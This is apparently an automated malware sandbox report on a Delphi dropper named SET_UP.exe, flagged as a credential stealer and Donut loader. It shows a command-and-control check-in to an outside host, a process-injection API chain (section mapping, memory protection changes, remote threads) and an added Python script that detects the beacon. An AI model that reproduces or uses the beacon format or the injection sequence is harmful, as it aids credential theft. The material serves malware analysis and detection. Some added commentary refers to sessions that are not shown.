                                                                                                Set-Cookie: PHPSESSID=smvkms29tbniul0a10qs5beok5; expires=Fri, 02 May 2025 08:02:02 GMT; Max-Age=9999999; path=/
                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Pragma: no-cache
                                                                                                X-Frame-Options: DENY
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                cf-cache-status: DYNAMIC
                                                                                                vary: accept-encoding
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCXFis5gsJrT4Een%2BZa%2F6c%2B5KuvbR4DOZuE5fGq%2F3%2BlKinjo4PyiX%2ByJKZyYcAeuniIHwGIad1yZzSKGCeMv%2BFAFhG2ZWUNWPn5MMqR95I9C%2Bfi5x9qymOyUzY2F%2B02271lmSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8fdc51b5da164304-EWR
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2532&min_rtt=1620&rtt_var=1259&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2031&delivery_rate=1802469&cwnd=248&unsent_bytes=0&cid=6f7ced39e484bc5e&ts=7651&x=0"
2025-01-06 14:15:23 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunked body; "f" is the hex length of the 15-byte chunk that follows): f
ok 8.46.123.189
2025-01-06 14:15:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii (terminating zero-length chunk): 0
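The four sessions above all have one shape: a multipart POST to /api carrying hwid, pid and lid fields, answered with a chunked body of "ok <ip>". The script below is an added example, not part of the Joe Sandbox report or of the sample's own code. It reconstructs session 3 from the decoded Data Ascii lines (CRLFs restored, Content-Length left out), parses the multipart body and the chunked reply, and scores the exchange against the traits visible in the capture. The field names come from the traffic above; the indicator list and the three-indicator threshold are this example's choices, not a documented LummaC specification.

```python
"""Parse and score a LummaC-style multipart check-in as captured above."""
import re

# Constructed from session 3 above: request headers and the decoded multipart body,
# with the CRLFs restored (Content-Length omitted; all values are as captured).
SAMPLE_REQUEST = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: multipart/form-data; boundary=8KZNW321KQR41UQ\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Host: glowscarrytsv.sbs\r\n"
    b"\r\n"
    b"--8KZNW321KQR41UQ\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"322DD9C345B95EE669AE778FE2799D69\r\n"
    b"--8KZNW321KQR41UQ\r\n"
    b'Content-Disposition: form-data; name="pid"\r\n\r\n'
    b"2\r\n"
    b"--8KZNW321KQR41UQ\r\n"
    b'Content-Disposition: form-data; name="lid"\r\n\r\n'
    b"hRjzG3--ELVIRA\r\n"
    b"--8KZNW321KQR41UQ--\r\n"
)
# Constructed from the chunked 200 reply above: a 0xf-byte chunk, then the 0 chunk.
SAMPLE_RESPONSE_BODY = b"f\r\nok 8.46.123.189\r\n0\r\n\r\n"

REQUIRED_FIELDS = {"hwid", "pid", "lid"}  # field names seen in every session above


def parse_http_request(raw):
    """Split a raw request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body, content_type):
    """Return {field name: value} for a multipart/form-data body."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if not m:
        return {}
    delimiter = b"--" + m.group(1).encode()
    fields = {}
    for part in body.split(delimiter):
        part = part.strip(b"\r\n")
        if not part or part == b"--":          # preamble / closing "--"
            continue
        part_head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', part_head)
        if name:
            fields[name.group(1).decode()] = value.decode("latin-1")
    return fields


def dechunk(body):
    """Decode a Transfer-Encoding: chunked body into its payload bytes."""
    out = b""
    while body:
        size_line, _, body = body.partition(b"\r\n")
        size = int(size_line.split(b";")[0], 16)
        if size == 0:
            break
        out += body[:size]
        body = body[size + 2:]                 # skip the chunk's trailing CRLF
    return out


def classify_checkin(request, response_body):
    """Score one request/response pair against the traits seen in the sessions above."""
    request_line, headers, body = parse_http_request(request)
    fields = parse_multipart(body, headers.get("content-type", ""))
    reply = dechunk(response_body).decode("latin-1").strip()
    indicators = []
    if request_line.startswith("POST /api "):
        indicators.append("POST /api")
    if REQUIRED_FIELDS.issubset(fields):
        indicators.append("multipart fields hwid/pid/lid")
    if re.fullmatch(r"[0-9A-F]{32}", fields.get("hwid", "")):
        indicators.append("32-hex-digit hwid")
    if re.fullmatch(r"[A-Za-z0-9]+--[A-Za-z0-9]+", fields.get("lid", "")):
        indicators.append("lid of the form <id>--<name>")
    if re.fullmatch(r"ok \d{1,3}(\.\d{1,3}){3}", reply):
        indicators.append("reply 'ok <ip>'")
    return {
        "host": headers.get("host"),
        "fields": fields,
        "reply": reply,
        "indicators": indicators,
        "suspect": len(indicators) >= 3,       # threshold is this example's choice
    }


if __name__ == "__main__":
    result = classify_checkin(SAMPLE_REQUEST, SAMPLE_RESPONSE_BODY)
    for key, value in result.items():
        print(f"{key}: {value}")
```

The same hwid and lid values recur across all four sessions while pid steps through 2, 3, 1, 1, so in a proxy log the pair (hwid, lid) is the stable key to pivot on; the Host header and the PHPSESSID cookie change per deployment and per request and are weaker pivots.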



                                                                                                Target ID:0
                                                                                                Start time:09:14:58
                                                                                                Start date:06/01/2025
                                                                                                Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                Imagebase:0x400000
                                                                                                File size:77'268'426 bytes
                                                                                                MD5 hash:5B0BAFDDDBC54BCBC57B87DFB94D0C64
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:Borland Delphi
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792533320.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1807281482.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1792533320.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.2%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:31.6%
                                                                                                  Total number of Nodes:117
                                                                                                  Total number of Limit Nodes:10
                                                                                                  execution_graph 14212 950409 14213 950417 14212->14213 14228 950d59 14213->14228 14215 9509a2 14216 9505af GetPEB 14218 95062c 14216->14218 14217 95056a 14217->14215 14217->14216 14231 950b19 14218->14231 14221 95068d CreateThread 14223 950665 14221->14223 14243 9509c9 GetPEB 14221->14243 14222 95089d 14226 95098d TerminateProcess 14222->14226 14223->14222 14239 951019 GetPEB 14223->14239 14226->14215 14227 950b19 4 API calls 14227->14222 14241 950d79 GetPEB 14228->14241 14230 950d66 14230->14217 14232 950b2f CreateToolhelp32Snapshot 14231->14232 14234 95065f 14232->14234 14235 950b66 Thread32First 14232->14235 14234->14221 14234->14223 14235->14234 14236 950b8d 14235->14236 14236->14234 14237 950bc4 Wow64SuspendThread 14236->14237 14238 950bee CloseHandle 14236->14238 14237->14238 14238->14236 14240 9506e7 14239->14240 14240->14222 14240->14227 14242 950d94 14241->14242 14242->14230 14244 950a22 14243->14244 14245 950a82 CreateThread 14244->14245 14246 950acf 14244->14246 14245->14244 14247 9511f9 14245->14247 14250 9a2fbe 14247->14250 14251 9a30cd 14250->14251 14252 9a2fe3 14250->14252 14262 9a4299 14251->14262 14286 9a5840 14252->14286 14255 9a2ffb 14256 9a5840 LoadLibraryA 14255->14256 14261 9511fe 14255->14261 14257 9a303d 14256->14257 14258 9a5840 LoadLibraryA 14257->14258 14259 9a3059 14258->14259 14260 9a5840 LoadLibraryA 14259->14260 14260->14261 14263 9a5840 LoadLibraryA 14262->14263 14264 9a42bc 14263->14264 14265 9a5840 LoadLibraryA 14264->14265 14266 9a42d4 14265->14266 14267 9a5840 LoadLibraryA 14266->14267 14268 9a42f2 14267->14268 14269 9a431b 14268->14269 14270 9a4307 VirtualAlloc 14268->14270 14269->14261 14270->14269 14273 9a4335 14270->14273 14271 9a5840 LoadLibraryA 14272 9a43b3 14271->14272 14272->14269 14274 9a4409 14272->14274 14290 9a5647 14272->14290 14273->14271 14284 9a458e 14273->14284 14275 9a5840 LoadLibraryA 14274->14275 14276 9a446b 
14274->14276 14274->14284 14275->14274 14276->14284 14285 9a44cd 14276->14285 14318 9a3429 14276->14318 14278 9a464c VirtualFree 14278->14269 14280 9a44b6 14280->14284 14325 9a3524 14280->14325 14283 9a45eb 14283->14283 14284->14278 14284->14283 14285->14284 14294 9a49c9 14285->14294 14287 9a5857 14286->14287 14288 9a587e 14287->14288 14344 9a3945 14287->14344 14288->14255 14292 9a565c 14290->14292 14291 9a56d2 LoadLibraryA 14293 9a56dc 14291->14293 14292->14291 14292->14293 14293->14272 14295 9a4a04 14294->14295 14296 9a4a4b NtCreateSection 14295->14296 14297 9a4a70 14295->14297 14317 9a5078 14295->14317 14296->14297 14296->14317 14298 9a4b05 NtMapViewOfSection 14297->14298 14297->14317 14305 9a4b25 14298->14305 14299 9a4dac 14300 9a4e4e VirtualAlloc 14299->14300 14302 9a5647 LoadLibraryA 14299->14302 14304 9a4e4a 14299->14304 14330 9a56e5 14299->14330 14306 9a4e90 14300->14306 14301 9a5647 LoadLibraryA 14301->14305 14302->14299 14303 9a4f41 VirtualProtect 14307 9a500c VirtualProtect 14303->14307 14311 9a4f61 14303->14311 14304->14300 14305->14299 14305->14301 14308 9a56e5 LoadLibraryA 14305->14308 14305->14317 14306->14303 14314 9a4f2e NtMapViewOfSection 14306->14314 14306->14317 14309 9a503b 14307->14309 14308->14305 14316 9a5186 14309->14316 14309->14317 14334 9a53fa 14309->14334 14311->14307 14315 9a4fe6 VirtualProtect 14311->14315 14312 9a518e CreateThread 14312->14317 14314->14303 14314->14317 14315->14311 14316->14312 14316->14317 14317->14284 14319 9a5647 LoadLibraryA 14318->14319 14320 9a343d 14319->14320 14321 9a56e5 LoadLibraryA 14320->14321 14324 9a3445 14320->14324 14322 9a345d 14321->14322 14323 9a56e5 LoadLibraryA 14322->14323 14322->14324 14323->14324 14324->14280 14326 9a5647 LoadLibraryA 14325->14326 14327 9a353a 14326->14327 14328 9a56e5 LoadLibraryA 14327->14328 14329 9a354a 14328->14329 14329->14285 14331 9a5816 14330->14331 14332 9a5700 14330->14332 14331->14299 14332->14331 14338 9a3aea 14332->14338 14337 9a5422 14334->14337 14335 9a5614 
14335->14316 14336 9a56e5 LoadLibraryA 14336->14337 14337->14335 14337->14336 14339 9a3b09 14338->14339 14340 9a3b2f 14338->14340 14339->14340 14342 9a3b3c 14339->14342 14343 9a56e5 LoadLibraryA 14339->14343 14341 9a5647 LoadLibraryA 14340->14341 14340->14342 14341->14342 14342->14331 14343->14339 14346 9a3965 14344->14346 14347 9a3a4a 14344->14347 14345 9a3aea LoadLibraryA 14345->14347 14346->14345 14346->14347 14347->14287
APIs
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 009A4A62
• NtMapViewOfSection.NTDLL(?,00000000), ref: 009A4B0A
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 009A4E7E
• NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 009A4F33
• VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 009A4F50
• VirtualProtect.KERNEL32(?,?,?,00000000), ref: 009A4FF3
• VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 009A5026
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 009A5197
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID: Virtual$ProtectSection$CreateView$AllocThread
• String ID:
• API String ID: 1248616170-0
• Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
• Instruction ID: 863d92401d8c7df92ead23612ea7201fb27bfa2f71c59a88f93775df3485701e
• Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
• Instruction Fuzzy Hash: 26428871608701AFDB24CF24C884B6BBBE9EFC9714F15492DF9999B241E7B4E840CB91

Control-flow Graph

APIs
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,0095065F,?,00000001,?,81EC8B55,000000FF), ref: 00950B57
• Thread32First.KERNEL32(00000000,0000001C), ref: 00950B83
• Wow64SuspendThread.KERNEL32(00000000), ref: 00950BD6
• CloseHandle.KERNEL32(00000000), ref: 00950C00
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
• String ID:
• API String ID: 1849706056-0
• Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction ID: 281dcc8f43aeb97cf232c123d087d4a373b9652c57ae6e38c86df23e9b6a2344
• Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
• Instruction Fuzzy Hash: 66410C75A00108AFDB18DF99C491BADB7B6EFC8300F10C168EA559B794DA34AE45CB54

Control-flow Graph

APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 009506AC
• TerminateProcess.KERNELBASE(000000FF,00000000), ref: 009509A0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID: CreateProcessTerminateThread
• String ID: }zk@
• API String ID: 1197810419-295876903
• Opcode ID: ccdc78e6cc621a474320049fa84a9fda98614b9e929602b22d865eb6ba0a8ee6
• Instruction ID: 89765397ac2090202c37c726c5f10cee087fe013b6f297502019481f842e2870
• Opcode Fuzzy Hash: ccdc78e6cc621a474320049fa84a9fda98614b9e929602b22d865eb6ba0a8ee6
• Instruction Fuzzy Hash: 5612F4B0E00219DFDB14CF99C990BADBBB1FF88304F2082A9E915AB385D7346A45CF54

Control-flow Graph

APIs
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00950A95
Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID: ,
• API String ID: 2422867632-3772416878
• Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction ID: bb0bcc1aaf81e4ec901ac897a9d6a42235cfe2b6e2cf0970da63624c5f712e94
• Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
• Instruction Fuzzy Hash: DD41E574A00209EFDB04CF99C994BAEB7B1FF88305F208598E9156B381D375AE85CF94

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(00000000,?,?), ref: 009A56D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: .dll
• API String ID: 1029625771-2738580789
• Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
• Instruction ID: a75a44fb389ce7d8f25635b4ea8a4eac2e73cd7aa06676fb9bb685bceb1f6686
• Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
• Instruction Fuzzy Hash: 2521E472700A859FEB21CF68C844A697BA8FF02324F5A456CE8028BA51D730EC458BC0

Control-flow Graph

APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009A4313
• VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 009A4657
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
• Instruction ID: 4f0eb0b79576af0244366c2abe0760992bab92e518ac9ddeacd5b5230cfabbc3
• Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
• Instruction Fuzzy Hash: 30B1F371600B02EBDB219E60CC81BA7B7ECFF8B314F140529F99986151EBB5E950DBE1

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ $ $"$$$$$%$%$&$'$($*$*$+$,$-$.$.$/$/$0$2$2$3$4$4$6$6$8$:$;$<$>$?$@$@$B$D$D$F$H$H$J$K$K$K$L$L$L$N$P$P$R$S$T$U$V$V$W$X$Y$Z$[$\$\$\$^$d$e$f$g$h$j$l$m$n$n$t$t$u$w$y$z${$|$}$~$~
• API String ID: 0-1852530521
• Opcode ID: 6387563601b03344c1c6328616388ea1876f316e2469d9acc14d63fac05655dc
• Instruction ID: dcade0c40b4240bdbebbf5fe2ea62d9e1f9769e2ed22071664ddb17e1d562508
• Opcode Fuzzy Hash: 6387563601b03344c1c6328616388ea1876f316e2469d9acc14d63fac05655dc
• Instruction Fuzzy Hash: 4522EF2080C7D9C9DB32C67C9C497DDBFA11B27324F0847D8D5E86B2D2D2790A89DB66
Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: $ $!$!$"$#$$$%$%$&$'$'$($($($)$)$*$*$*$,$-$.$.$.$.$/$1$4$4$6$7$:$;$>$@$B$C$D$D$D$D$D$I$J$J$M$O$S$T$[$\$]$`$e$f$h$i$i$j$l$l$m$m$m$n$o$p$q$r$x$y$y$|$|$}$}$~
• API String ID: 0-426187509
• Opcode ID: f68d6b00179b0507484bffa4a2ad5d876588dcf58b440864c378117cdbbac513
• Instruction ID: 92e518ba0a5aaa24aefb6e16df98e698f0963bca2223b1671b725ba5ea90773b
• Opcode Fuzzy Hash: f68d6b00179b0507484bffa4a2ad5d876588dcf58b440864c378117cdbbac513
• Instruction Fuzzy Hash: 2803BC7150C7C18AD3349B3888883AFBFD1AB96324F188E6DE4E9873D2D77985458B53

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
Yara matches
Similarity
• API ID:
• String ID: $"$$$&$,$.$/$8$:$<$>$j$k$l$m$m$n$t$v$v$z${${${
• API String ID: 0-3828528821
• Opcode ID: dbd49799df778e91aeafa61c40d22269fad0fb97f3d7929a49da28dfe46e673a
• Instruction ID: 4c7bfdf26f779db833369ed358a9c3ad8c605c8da88a5106e19563f8a77b9170
• Opcode Fuzzy Hash: dbd49799df778e91aeafa61c40d22269fad0fb97f3d7929a49da28dfe46e673a
• Instruction Fuzzy Hash: A0C16231908BE98ADB36C63C9C583C9AFA15B67324F0843D8D1E96B3D2C6750F86CB55

Control-flow Graph

                                                                                                  control_flow_graph 967 962ac1-962adf 968 962ae4-962af2 967->968 968->968 969 962af4-962af8 968->969 970 962afa-962afd 969->970 971 962b55-962b8c call 953156 970->971 972 962aff-962b53 970->972 975 962b91-962b9f 971->975 972->970 975->975 976 962ba1-962ba3 975->976 977 962ba7-962baa 976->977 978 962bac-962bc7 977->978 979 962bc9-962bef call 953156 977->979 978->977 982 962bf3-962bf7 979->982 983 962bf1-962c30 call 966386 979->983 985 9636b9 982->985 990 962c34-962c7b call 959a66 call 95c426 983->990 991 962c32 983->991 986 96430a 985->986 989 96430c-964321 call 9537e6 986->989 998 960cd5-960d03 call 9537f6 989->998 999 960ccc-964332 989->999 1003 962c80-962c8e 990->1003 991->990 1007 960d08-960d16 998->1007 1003->1003 1006 962c90 1003->1006 1009 962c92-962c95 1006->1009 1007->1007 1008 960d18-960d1c 1007->1008 1010 960d1e-960d21 1008->1010 1011 962c97-962ce3 1009->1011 1012 962ce5-962d03 call 953156 1009->1012 1014 960d23-960d8e 1010->1014 1015 960d90-960dfa call 9536e6 1010->1015 1011->1009 1018 962da9-962de3 call 966386 1012->1018 1019 962d09-962d81 call 966386 1012->1019 1014->1010 1022 960dfe-960e02 1015->1022 1023 960dfc-960e25 1015->1023 1031 962de7-962e74 call 959a66 call 95c426 1018->1031 1032 962de5 1018->1032 1028 962d85-962da4 call 959a66 call 95c426 1019->1028 1029 962d83 1019->1029 1022->989 1030 960e2a-960e38 1023->1030 1028->1018 1029->1028 1030->1030 1035 960e3a 1030->1035 1048 962e79-962e84 1031->1048 1032->1031 1038 960e3c-960e3f 1035->1038 1041 960e91-960ee0 call 953256 1038->1041 1042 960e41-960e8f 1038->1042 1041->986 1046 960ee6 1041->1046 1042->1038 1046->986 1048->1048 1049 962e86 1048->1049 1050 962e88-962e8b 1049->1050 1051 962ecc-962ed9 1050->1051 1052 962e8d-962eca 1050->1052 1053 962edd-962eeb call 959a76 1051->1053 1054 962edb-962f09 1051->1054 1052->1050 1053->985 1057 962f0d-962f5a call 959a66 1054->1057 1058 962f0b 1054->1058 1064 962f5c-962f74 call 959a76 * 2 1057->1064 1065 962f79-962fa5 call 959a76 1057->1065 1058->1057 1080 9636b7 1064->1080 1072 962faa-962fb8 1065->1072 1072->1072 1074 962fba-962fbe 1072->1074 1076 962fc0-962fc3 1074->1076 1078 962fc5-96300a 1076->1078 1079 96300c-96303a call 953156 1076->1079 1078->1076 1084 96303e-963071 call 966386 1079->1084 1085 96303c 1079->1085 1080->985 1092 963075-963099 call 959a66 call 95c426 1084->1092 1093 963073 1084->1093 1086 96309e-9630b8 1085->1086 1088 9630bb-9630be 1086->1088 1090 9630c0-9630df 1088->1090 1091 9630e1-963127 call 953456 1088->1091 1090->1088 1099 96312c-96313a 1091->1099 1092->1086 1093->1092 1099->1099 1100 96313c 1099->1100 1101 96313e-963141 1100->1101 1102 9631c7-9631ec call 953366 1101->1102 1103 963147-9631c2 1101->1103 1106 963595-96361e call 95a596 call 967246 call 95b146 1102->1106 1107 9631f2-96323a call 9537e6 1102->1107 1103->1101 1122 963620-963634 1106->1122 1123 96365e-963689 call 959a76 * 2 1106->1123 1113 96323e-96325b call 959a66 1107->1113 1114 96323c 1107->1114 1120 96327f-963281 1113->1120 1121 96325d-963269 1113->1121 1114->1113 1125 963283-96328f 1120->1125 1124 96326b-963277 call 966466 1121->1124 1127 963636-96363c 1122->1127 1128 963652-96365a call 959a76 1122->1128 1156 963695-96369f 1123->1156 1157 96368b-963693 call 959a76 1123->1157 1141 963279-96327d 1124->1141 1130 9632a3-9632d5 call 9537f6 1125->1130 1131 963291-96329e 1125->1131 1140 96363e-96364e call 9665e6 1127->1140 1128->1123 1143 9632da-9632e5 1130->1143 1131->1106 1151 963650 1140->1151 1141->1120 1143->1143 1146 9632e7 1143->1146 1149 9632e9-9632ec 1146->1149 1152 9632ee-963316 1149->1152 1153 963318-96334e call 953156 1149->1153 1151->1128 1152->1149 1163 963355-963358 1153->1163 1160 9636a1-9636a9 call 959a76 1156->1160 1161 9636ab-9636b2 call 95a676 1156->1161 1157->1156 1160->1161 1161->1080 1166 963394-9633d9 call 953156 1163->1166 1167 96335a-963392 1163->1167 1171 9633de-9633ec 1166->1171 1167->1163 1171->1171 1172 9633ee-9633f0 1171->1172 1173 9633f4-9633f7 1172->1173 1174 96341f-963468 call 953456 1173->1174 1175 9633f9-96341d 1173->1175 1178 96346d-96347b 1174->1178 1175->1173 1178->1178 1179 96347d 1178->1179 1180 96347f-963482 1179->1180 1181 963513-963590 call 953456 call 966486 1180->1181 1182 963488-96350e 1180->1182 1181->1125 1182->1180
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: %$1$<$>$@$C$M$N$Q$R$Y$i$v$}
                                                                                                  • API String ID: 0-4071272931
                                                                                                  • Opcode ID: b84c29f9d0a2ea2ec2f58870ac9baa18fd95e5e539783611f234c28677e2a37d
                                                                                                  • Instruction ID: 71f32f71c817aa9d3c806da89ac49ffdb777388386001c616ee0b02f5f9c0441
                                                                                                  • Opcode Fuzzy Hash: b84c29f9d0a2ea2ec2f58870ac9baa18fd95e5e539783611f234c28677e2a37d
                                                                                                  • Instruction Fuzzy Hash: 3962C67260C7808BD724DB39C8953AEBBD1ABD5324F198E3DD4E9C73C2D67989058B42

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 1191 95aca6-95ad29 1192 95ad36-95ad5a 1191->1192 1192->1192 1193 95ad5c-95ad88 1192->1193 1194 95ad96-95ade4 1193->1194 1194->1194 1195 95ade6-95ae8e 1194->1195 1196 95ae96-95aebf 1195->1196 1196->1196 1197 95aec1-95aee5 1196->1197 1198 95aee6-95aefa 1197->1198 1198->1198 1199 95aefc-95af05 1198->1199 1200 95af07-95af0d 1199->1200 1201 95af21-95af31 1199->1201 1202 95af16-95af1f 1200->1202 1203 95af41-95af4b 1201->1203 1204 95af33 1201->1204 1202->1201 1202->1202 1206 95af61-95af69 1203->1206 1207 95af4d-95af51 1203->1207 1205 95af36-95af3f 1204->1205 1205->1203 1205->1205 1209 95af81-95af8b 1206->1209 1210 95af6b-95af6c 1206->1210 1208 95af56-95af5f 1207->1208 1208->1206 1208->1208 1212 95afa1-95afaf 1209->1212 1213 95af8d-95af91 1209->1213 1211 95af76-95af7f 1210->1211 1211->1209 1211->1211 1215 95afc1-95b002 1212->1215 1216 95afb1-95afb5 1212->1216 1214 95af96-95af9f 1213->1214 1214->1212 1214->1214 1218 95b004-95b00a 1215->1218 1219 95b00b-95b037 1215->1219 1217 95afb6-95afbf 1216->1217 1217->1215 1217->1217 1218->1219 1220 95b046-95b05a 1219->1220 1220->1220 1221 95b05c-95b08b 1220->1221 1222 95b096-95b0bc 1221->1222 1222->1222 1223 95b0be-95b0c5 1222->1223 1224 95b0c7-95b0cb 1223->1224 1225 95b0e1-95b0ea 1223->1225 1228 95b0d6-95b0df 1224->1228 1226 95b101-95b10b 1225->1226 1227 95b0ec-95b0ef 1225->1227 1230 95b121-95b136 1226->1230 1231 95b10d-95b111 1226->1231 1229 95b0f6-95b0ff 1227->1229 1228->1225 1228->1228 1229->1226 1229->1229 1232 95b116-95b11f 1231->1232 1232->1230 1232->1232
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1906349793.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_950000_SET_UP.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
